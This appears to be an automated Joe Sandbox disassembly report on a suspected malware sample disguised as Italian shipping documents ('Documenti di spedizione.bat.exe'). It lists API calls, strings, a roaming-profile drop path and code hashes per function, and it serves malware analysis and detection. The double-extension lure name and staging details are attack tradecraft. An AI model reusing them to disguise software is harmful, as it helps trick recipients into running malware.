                                                  • Instruction ID: 26959a90f0a266772171a70e0d2c3eddd0d3dcd8a9821819e75e01dae6d4cf8f
                                                  • Opcode Fuzzy Hash: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                  • Instruction Fuzzy Hash: 1EB158B0900608FFEB11AF60DD859AE7B79FB08354F00413AFA45BA1A0CB785E51DF68
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                  • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C79
                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404C85
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                    • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00000400,00404CCE), ref: 00405CF9
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                    • Part of subcall function 00406950: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                  • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D5A
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                    • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                    • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                    • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Roaming\Premolder\Mokl$Call$H/B
                                                  • API String ID: 2624150263-882730665
                                                  • Opcode ID: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                  • Instruction ID: d1d33be9ed2b3c34a6912e34267e60509d8c64d33f654f2361a06684bbdb7283
                                                  • Opcode Fuzzy Hash: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                  • Instruction Fuzzy Hash: FBA191B1900209ABDB11AFA5CD41AEFB7B8FF84754F11843BF601B62D1DB7C89418B69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 00a330d8d8c13441593921db70a8cb17a676f2e75f0fcbbed06ef6cfd4e26c9a
                                                  • Instruction ID: 5eb670257f645768a78f75f5229fdd379fa6a203c359b676d04f77a704ba2a21
                                                  • Opcode Fuzzy Hash: 00a330d8d8c13441593921db70a8cb17a676f2e75f0fcbbed06ef6cfd4e26c9a
                                                  • Instruction Fuzzy Hash: 9DF08271A04105AADB00EBA5D9499AEB378EF14314F60017BE111F31E5D7B88E51DB29
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,00000010,?,00000040,00001018,73D82596,00000000,?), ref: 73D827D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: e0729a08a4cbdcadd32fc601dfeed76e89e07f4319c3007f9cc0e26fd38986c4
                                                  • Instruction ID: ebab0a5cd775e1f5702c79ba3e0de4309e5ffb276a440a0e041f170d6c922537
                                                  • Opcode Fuzzy Hash: e0729a08a4cbdcadd32fc601dfeed76e89e07f4319c3007f9cc0e26fd38986c4
                                                  • Instruction Fuzzy Hash: C1F014B2510344CEE7219F398416BC17BE1BB09314F254698E1EAAB291C3B47880CB98
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                  • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                  • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                  • DeleteObject.GDI32(00000000), ref: 00405188
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                    • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                  • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                  • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                  • GlobalFree.KERNEL32(?), ref: 004054C8
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                  • ShowWindow.USER32(?,00000000), ref: 00405672
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                  • ShowWindow.USER32(00000000), ref: 00405684
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                  • Instruction ID: 34ca0daebb1283ae0dea41fcbe79f03df20d3d5ccd25e7298a94edbde83860af
                                                  • Opcode Fuzzy Hash: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                  • Instruction Fuzzy Hash: F5028C70A00609AFDB20DF55CD45AAF7BB5FB84314F50857AF910BA2E1D7B98A42CF18
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                  • ShowWindow.USER32(?), ref: 0040417E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                  • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                  • DestroyWindow.USER32 ref: 004041BD
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                  • GetDlgItem.USER32(?,?), ref: 004041F5
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                  • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                  • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                  • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                  • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                  • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                  • EnableWindow.USER32(?,?), ref: 00404409
                                                  • EnableWindow.USER32(?,?), ref: 00404424
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                  • EnableMenuItem.USER32(00000000), ref: 00404441
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                  • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404496
                                                  • SetWindowTextW.USER32(?,00422F48), ref: 004044AA
                                                  • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: H/B
                                                  • API String ID: 1860320154-184950203
                                                  • Opcode ID: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                  • Instruction ID: 9a8659dd655c0040c26f3da6c71aaed3cdb3e7512c47e66a19b3526095f1ef41
                                                  • Opcode Fuzzy Hash: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                  • Instruction Fuzzy Hash: 0FC1CEB1600604BBDB216F61EE85E2B7A68FB85345F41093EF741B25F0CB799842DB2D
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                  • GetSysColor.USER32(?), ref: 004048C0
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                  • lstrlenW.KERNEL32(?), ref: 004048E1
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                  • SendMessageW.USER32(00000000), ref: 00404963
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                  • SetCursor.USER32(00000000), ref: 004049E2
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                  • SetCursor.USER32(00000000), ref: 004049FE
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N$WG@
                                                  • API String ID: 3103080414-3807701841
                                                  • Opcode ID: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                  • Instruction ID: 54d9d544d8a339ed1f673c4731e81340660bcd02aea44dc88bd758a97d32eb83
                                                  • Opcode Fuzzy Hash: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                  • Instruction Fuzzy Hash: 2B61A0B1A40209BFDB10AF64CD85AAA7B69FB84314F00843AF605B72D0C779AD51CF98
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,Civilisere Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: Civilisere Setup$F
                                                  • API String ID: 941294808-4258167560
                                                  • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                  • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                  • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040632C
                                                    • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                    • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                  • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406349
                                                  • wsprintfA.USER32 ref: 00406367
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 004063A2
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                    • Part of subcall function 00406192: GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00406196
                                                    • Part of subcall function 00406192: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                  • API String ID: 2171350718-2529913679
                                                  • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                  • Instruction ID: 9150ff15d44dd6ac7e39c2a3973aa46bc34ee9e674c79fba1fcd409278ee571c
                                                  • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                  • Instruction Fuzzy Hash: A0312370600325BBD2206F65AD49F6B3A5CDF41754F12403AFA02B62D3DA7CD82586BD
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                  • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406951
                                                  • *?|<>/":, xrefs: 004069A2
                                                  • "C:\Users\user\Desktop\Documenti di spedizione.bat.exe", xrefs: 00406994
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-4025309804
                                                  • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                  • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                  • GetSysColor.USER32(00000000), ref: 004046E3
                                                  • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                  • SetBkMode.GDI32(?,?), ref: 004046FB
                                                  • GetSysColor.USER32(?), ref: 0040470E
                                                  • SetBkColor.GDI32(?,?), ref: 0040471E
                                                  • DeleteObject.GDI32(?), ref: 00404738
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                  Memory Dump Source
